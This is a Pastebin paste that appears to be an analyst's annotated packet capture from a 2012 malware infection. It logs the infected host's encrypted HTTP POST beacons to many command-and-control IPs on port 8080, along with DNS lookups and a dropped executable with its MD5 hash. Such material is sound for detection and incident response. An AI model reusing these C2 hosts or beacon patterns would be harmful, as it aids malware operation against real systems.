Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----------details-internet traffic-------------------
- //Try to reach 208.87.243.18
- 192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // a http POST command to 74.207.237.170:8080
- 192.168.7.84 74.207.237.170:8080 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 74.207.237.170:8080
- Content-Length: 347
- Connection: Keep-Alive
- Cache-Control: no-cache
- ......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
- DP.....O@xt,U..V|............c1..4~:
- R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
- .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
- W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
- .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
- u..2.~@
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 01 83 00 3f 40 00 80 06 f8 bf c0 a8 07 54 4a cf ...?@... .....TJ.
- 0020 ed aa 04 11 1f 90 5a 54 91 b8 89 da 8f 5b 50 18 ......ZT .....[P.
- 0030 42 30 27 30 00 00 2e d7 f7 a7 03 ea 64 55 cf d6 B0'0.... ....dU..
- 0040 5a 50 e9 81 b2 b6 59 09 79 79 e6 b8 7c 34 24 52 ZP....Y. yy..|4$R
- 0050 a3 22 06 a4 11 86 ac 75 e0 08 b3 2b 54 12 a4 31 .".....u ...+T..1
- : : : :
- 0130 70 18 57 c8 97 30 ac 6d 93 08 fb a2 41 3f aa 75 p.W..0.m ....A?.u
- 0140 c7 83 e7 af 3d 7c 3c ef 5c 05 27 83 1e 2e d1 9b ....=|<. \.'.....
- 0150 88 df 35 1f 5f 37 27 f1 f9 34 36 0e b0 47 5c b7 ..5._7'. .46..G\.
- 0160 6f 22 20 16 cb e9 9c 7d 01 98 08 45 9f a5 4b bf o" ....} ...E..K.
- 0170 d5 90 32 65 45 e4 e9 2c b0 55 1d 3d ca 43 e2 e8 ..2eE.., .U.=.C..
- 0180 d8 d5 4b 74 55 e1 f6 9e 8d 75 a1 92 32 1c 7e 40 ..KtU... .u..2.~@
- 0190 7c |
- // With the encryption reply long binary data...
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 09:58:07 GMT
- Content-Type: text/html; charset=UTF-8
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- f3b
- .}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
- 2U...`......p_| ]X.$...B..A.F....}.snip
- .@C...4*j..|.\..%..xv-.....snip
- .1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
- z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
- [.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
- v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
- n..Z...fG..t...1.|...`Vsnip
- ...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
- %.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
- .g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
- :
- :snip
- :
- .%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
- 3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
- .<p....N....,..v......R...d..U_...?....k...-.....E%.snip
- ...a.AZ$......H...7r......
- 0
- ////Some more comm try to connect to 132.248.49.112
- 192.168.7.84 132.248.49.112 TCP afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 132.248.49.112 192.168.7.84 TCP http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // At this point, in the %Temp% folder, the previous data was saved:
- FileName: exp2.tmp.exe
- tiimeStamp: 2012/12/15 18:58 122,880
- MD5 ce7474646297ed818bb8ed48f50c7e1e
- // DNS requests to...
- 112.49.248.132.in-addr.arpa web.ecologia.unam.mx
- 77.65.130.113.in-addr.arpa ns.shinbiro.com..domain
- 00000000 35 ea 01 00 00 01 00 00 00 00 00 00 03 31 31 32 5....... .....112
- 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
- 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 ddr.arpa .....
- 00000000 35 ea 81 80 00 01 00 01 00 00 00 00 03 31 31 32 5....... .....112
- 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
- 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 ddr.arpa ........
- 00000030 0c 00 01 00 00 1c 1f 00 16 03 77 65 62 08 65 63 ........ ..web.ec
- 00000040 6f 6c 6f 67 69 61 04 75 6e 61 6d 02 6d 78 00 ologia.u nam.mx.
- 0000002D cb 61 01 00 00 01 00 00 00 00 00 00 02 37 37 02 .a...... .....77.
- 0000003D 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
- 0000004D 64 72 04 61 72 70 61 00 00 0c 00 01 dr.arpa. ....
- 0000004F cb 61 81 83 00 01 00 00 00 01 00 00 02 37 37 02 .a...... .....77.
- 0000005F 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
- 0000006F 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0f 00 06 dr.arpa. ........
- 0000007F 00 01 00 00 07 07 00 2e 02 6e 73 08 73 68 69 6e ........ .ns.shin
- 0000008F 62 69 72 6f 03 63 6f 6d 00 06 64 6f 6d 61 69 6e biro.com ..domain
- 0000009F c0 3b 77 bf 64 79 00 00 2a 30 00 00 0e d8 00 12 .;w.dy.. *0......
- 000000AF 75 00 00 01 51 80 u...Q.
- //Another POST command detected to 203.113.98.131:80
- POST /asp/intro.php HTTP/1.0
- Host: 203.113.98.131
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 257
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w
- .....}..5.+..6.SD4.>
- t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:01:37 GMT
- Content-Type: text/html; charset=windows-1251
- Connection: close
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 16
- STATUS-IMPORT-OK
- // At this point the malware process exp2.tmp.exe was started....
- ---------------take 2---------------------
- // send ACK packet (try to connect) to 74.207.237.170
- 192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // send ping to 209.190.61.50
- 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
- 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
- // make communications via HTTP/POST to 174.143.174.136:8080
- //post....
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 174.143.174.136:8080
- Content-Length: 408
- Connection: Keep-Alive
- Cache-Control: no-cache
- .m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J..
- .....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$.
- .+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ
- .~q.+......Sk.i...........t....!.m*......;..w."...[.'
- ..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK
- // reply:
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:13:52 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......\z#W.2.Pp_..NU..
- // post...
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 174.143.174.136:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-."
- ..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK
- //reply....
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:13:52 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`........X.'8...".~K..J.
- // Try to esablish connection with 199.71.215.194
- 192.168.7.84 199.71.215.194 TCP cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 199.71.215.194 192.168.7.84 TCP http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // Communication via HTTP/POST with 210.56.23.100:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 210.56.23.100:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
- ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
- .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
- V.R
- ...-v!..38s)ab|....bKU..$..S..</.
- )4..1+...>.O.....HTTP/1.1 200 OK
- Server: nginx/1.0.11
- Date: Sat, 15 Dec 2012 10:05:22 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.........c.M..A..9.....
- //try connect again with 132.248.49.112
- 192.168.7.84 132.248.49.112 TCP rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 132.248.49.112 192.168.7.84 TCP http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // try to connect w/ 74.117.61.66
- 192.168.7.84 74.117.61.66 TCP socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 74.117.61.66 192.168.7.84 TCP http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- Communicating via HTTP/POST w/210.56.23.100:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 210.56.23.100:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
- ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
- .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
- V.R
- ...-v!..38s)ab|....bKU..$..S..</.
- )4..1+...>.O.....HTTP/1.1 200 OK
- Server: nginx/1.0.11
- Date: Sat, 15 Dec 2012 10:05:22 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.........c.M..A..9.....
- //Try to communicate w/ 173.192.229.36
- 173.192.229.36 192.168.7.84 TCP http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- 192.168.7.84 173.192.229.36 TCP mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- // Communication HTTTP/POST with 69.64.89.82:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 69.64.89.82:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ..[.
- 8.|.
- . ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..?
- ....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v.........
- .......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./
- .e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 02:51:22 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......O..z.zj....>..;..
- // try to establish conn to: 173.224.221.135
- 192.168.7.84 173.224.221.135 TCP ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 173.224.221.135 192.168.7.84 TCP http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // try to estacblish conn to: 59.90.221.6
- 192.168.7.84 59.90.221.6 TCP ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 59.90.221.6 192.168.7.84 TCP http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // try to establish to 180.235.150.72
- 192.168.7.84 180.235.150.72 TCP sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 180.235.150.72 192.168.7.84 TCP http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // Communicating via HTTP/POST to 123.49.61.59:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
- ...
- 8....!'......Cr..,.8
- ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
- ..9..:...;I\....G/.G....HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:29:47 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
- .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
- ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
- ..jW.qO.*.j.'..f)I_7.
- R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:30:01 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......,.&.3.."cz@..[.a.
- // Communicating with HTTP/POST with 123.49.61.59:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- .K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4
- ...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..(
- ...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:29:45 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.........X)myU.>.^....JPOST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
- ...
- 8....!'......Cr..,.8
- ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
- ..9..:...;I\....G/.G....HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:29:47 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
- .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
- ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
- ..jW.qO.*.j.'..f)I_7.
- R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:30:01 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......,.&.3.."cz@..[.a.
- //Try to establish conn to: 113.130.65.77
- 192.168.7.84 113.130.65.77 TCP hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 113.130.65.77 192.168.7.84 TCP http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- //Try to establish conn to: 180.235.150.72
- 802 795.966247 192.168.7.84 180.235.150.72 TCP saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 803 796.070637 180.235.150.72 192.168.7.84 TCP http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // making communication via HTTP/POST to 69.64.89.82:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 69.64.89.82:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- .X...j.K.!L.C..............3.8.|...........w..9...W
- .K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ
- l...[.h.........-.zR..J\...".Q
- w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[
- .T..3!k..T.U=1N.~d.c..C.m....
- ..}..&..y_5..u
- ..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 02:55:11 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......]...v.T.v..%s.\.$
- -----------------------------internet data ends--------------------
Add Comment
Please, Sign In to add comment